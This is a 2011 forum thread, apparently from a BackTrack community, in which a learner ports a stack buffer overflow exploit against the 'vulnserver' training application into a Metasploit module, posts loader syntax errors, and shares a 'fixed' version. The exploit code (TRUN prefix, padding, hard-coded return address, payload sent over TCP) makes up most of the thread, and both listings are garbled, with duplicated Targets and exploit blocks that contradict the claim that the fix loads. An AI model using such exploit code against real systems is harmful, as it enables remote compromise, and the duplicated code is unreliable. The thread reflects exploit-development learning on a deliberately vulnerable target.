Results 1 to 4 of 4

Thread: Error porting perl exploit into the Metasploit Framework (module failed to load)

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Germany
    Posts
    5

    Post Error porting perl exploit into the Metasploit Framework (module failed to load)

    Hello everyone,

    I have written this thread once before but I couldn't find it and my profile says that I haven't posted a thread yet.I guess it was because of NoScript.
    If this is a double post I apologize in advance.

    I have watched a video on fuzzing and writing an perl exploit (vulnserver) at portin it into Metasploit Framework.
    But when I launch msfconsole I always get compiling errors although I have written the ruby script exactly like shown in the video.Various times to exclude any errors.

    I also have contacted the author of the video but his last activity was in 2010 so I guess I will not get an answer anymore.

    Here is the ruby script code:

    Code:
    require 'msf/core'            
    
    class Metasploit3 < Msf::Exploit::Remote
            Rank = AverageRanking
    
            include Msf::Exploit::Remote::Tcp
    
            def initialize(info={})
                    super(update_info(info,
                            'Name'          => 'Vulnerable Server BOF',
                            'Description'   => %q{
                                    This module exploits a stack based overflow in vulnserver,
                                    },
                            'Author'        => 'Me'
                            'Version'       => '$Revision: 1$',
                            'Platform'      => 'win',
                            'Payload'       =>
                                    {
                                            'BadChars'      => "\x00\x0d\x20\xad",
                                    },
                            'Targets'       =>
                                    [
                                            ['Windows XP SP3',{'Ret'=> 0x625011af,}],
                            'DefaultTarget' => 0,
                            ))
                            register_options([      Opt::RPORT(9999)],self.class)
                    end
    
                    def exploit
                            connect
    
                            header = "TRUN /.:/"
                            junk = make_nops(2003)
                            eip = [target.ret].pack('V')
                            nops = make_nops(20)
    
                            sploit = header + junk + eip + nops + payload.encoded
    
                            print_status("Trying #{target.name}...")
    
                            'Targets'       =>
                                    [
                                            ['Windows XP SP3',{'Ret'=> 0x625011af,}],
                            'DefaultTarget' => 0,
                            ))
                            register_options([      Opt::RPORT(9999)],self.class)
                    end
    
                    def exploit
                            connect
    
                            header = "TRUN /.:/"
                            junk = make_nops(2003)
                            eip = [target.ret].pack('V')
                            nops = make_nops(20)
    
                            sploit = header + junk + eip + nops + payload.encoded
    
                            print_status("Trying #{target.name}...")
    
                            sock.put(sploit)
    
                            handler
                            disconnect
                    end
            end
    And here is the error output when I am launching msfconsole:

    Code:
    root@bt:~# cd /opt/framework/msf3/
    root@bt:/opt/framework/msf3# ./msfconsole
    (eval):328: warning: don't put space before argument parentheses
    [-] WARNING! The following modules could not be loaded!
    [-]     /opt/framework/msf3/modules/exploits/windows/misc/vulnserver.rb: SyntaxError (eval):47:in `load_module_from_file': compile error
    (eval):15: syntax error, unexpected tSTRING_BEG, expecting ')'
                            'Version'       => '$Revision: 1$',
                             ^
    (eval):15: syntax error, unexpected tASSOC, expecting kEND
                            'Version'       => '$Revision: 1$',
                                              ^
    (eval):15: syntax error, unexpected ',', expecting kEND
    (eval):16: syntax error, unexpected tASSOC, expecting kEND
                            'Platform'      => 'win',
                                              ^
    (eval):16: syntax error, unexpected ',', expecting kEND
    (eval):17: syntax error, unexpected tASSOC, expecting kEND
    (eval):20: syntax error, unexpected ',', expecting kEND
    (eval):21: syntax error, unexpected tASSOC, expecting kEND
    (eval):24: syntax error, unexpected tASSOC, expecting ']'
                            'DefaultTarget' => 0,
                                              ^
    
    Call trans opt: received. 2-19-98 13:24:18 REC:Loc
    The Line "Don´t put spaces before argument parentheses" is pretty much self explaining but I keep getting the error after removing them.

    Please can anyone tell me what I am doing wrong? I really want to learn this.
    Thanks a lot and have a nice day everyone

    Greetings
    ph3anea5phr3ak

    UPDATE:

    The problem is solved and the module loads now.
    By comparing my the script with another exploit module, I could localize and fix some errors.
    Mow the module loads but I still get the following warning message:

    Code:
    root@bt:/opt/framework/msf3# ./msfconsole
    (eval):328: warning: don't put space before argument parentheses
                                                 
    
    
           =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
           =[ 743 exploits - 378 auxiliary - 86 post
           =[ 228 payloads - 27 encoders - 8 nops
           =[ svn r13843 updated yesterday (2011.10.09)
    
    msf >
    Here is the fixed code for those who want to compare:

    Code:
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
            Rank = AverageRanking                                                                                        
    
            include Msf::Exploit::Remote::Tcp
    
            def initialize(info = {}) 
                    super(update_info(info,
                            'Name'          => 'Vulnerable Server BOF',
                            'Description'   => %q{
                                    This module exploits a stack based overflow in vulnserver.
                                    },
                            'Author'        => 'Me', # <-- Comma was missing
                            'Version'       => '$Revision: 1 $',
                            'Platform'      => 'win',
                            'Payload'       =>
                                    { 
                                            'BadChars'      => "\x00\x0d\x20\xad",
                                    },
                            'Targets'       =>
                                    [ 
                                            ['Windows XP SP3',{ 'Ret'=> 0x625011af }],
                                    ],
                            'DefaultTarget' => 0
                            ))
                            register_options([      Opt::RPORT(9999)],self.class)
                    end
    
                    def exploit
                            connect
    
                            header = "TRUN /.:/"
                            junk = make_nops(2003)
                            eip = [target.ret].pack('V')
                            nops = make_nops(20)
    
                            sploit = header + junk + eip + nops + payload.encoded
    
    
      'Targets'       =>
                                    [ 
                                            ['Windows XP SP3',{ 'Ret'=> 0x625011af }],
                                    ], # <-- The bracket and comma was missing
                            'DefaultTarget' => 0
                            ))
                            register_options([      Opt::RPORT(9999)],self.class)
                    end
    
                    def exploit
                            connect
    
                            header = "TRUN /.:/"
                            junk = make_nops(2003)
                            eip = [target.ret].pack('V')
                            nops = make_nops(20)
    
                            sploit = header + junk + eip + nops + payload.encoded
    
                            print_status("Trying #{target.name}...")
    
                            sock.put(sploit)
    
                            handler
                            disconnect
                    end
            end
    If somebody could tell me how to fix the warning that would be great.I guess it is the Tab key
    Last edited by g0tmi1k; 10-15-2011 at 12:54 PM. Reason: Merged

  2. #2
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: Error porting perl exploit into the Metasploit Framework (module failed to load)

    I don't see any spacing that sticks out, but I don't know ruby very well either. I think your best bet would be to ask on the metasploit mailing list. I've seen several members of the dev team there, including HD Moore.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    Germany
    Posts
    5

    Default Re: Error porting perl exploit into the Metasploit Framework (module failed to load)

    Quote Originally Posted by scottm99 View Post
    I don't see any spacing that sticks out, but I don't know ruby very well either. I think your best bet would be to ask on the metasploit mailing list. I've seen several members of the dev team there, including HD Moore.
    Thank you scottm99 I´ll give that a try.Have an epic day

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: Error porting perl exploit into the Metasploit Framework (module failed to load)

    You're welcome...I hang out on the metasploit mailing list, but mostly as a lurker The list members (including the metasploit dev team) have been very helpful.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

Similar Threads

  1. Replies: 1
    Last Post: 07-23-2010, 08:13 AM
  2. Replies: 1
    Last Post: 01-21-2010, 07:46 PM
  3. metasploit exploit failed: The address is already in use
    By mikehawk in forum OLD Newbie Area
    Replies: 1
    Last Post: 10-14-2009, 04:51 AM
  4. failed to load module with msfconsole
    By imported_bulgin in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 12-15-2007, 02:05 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •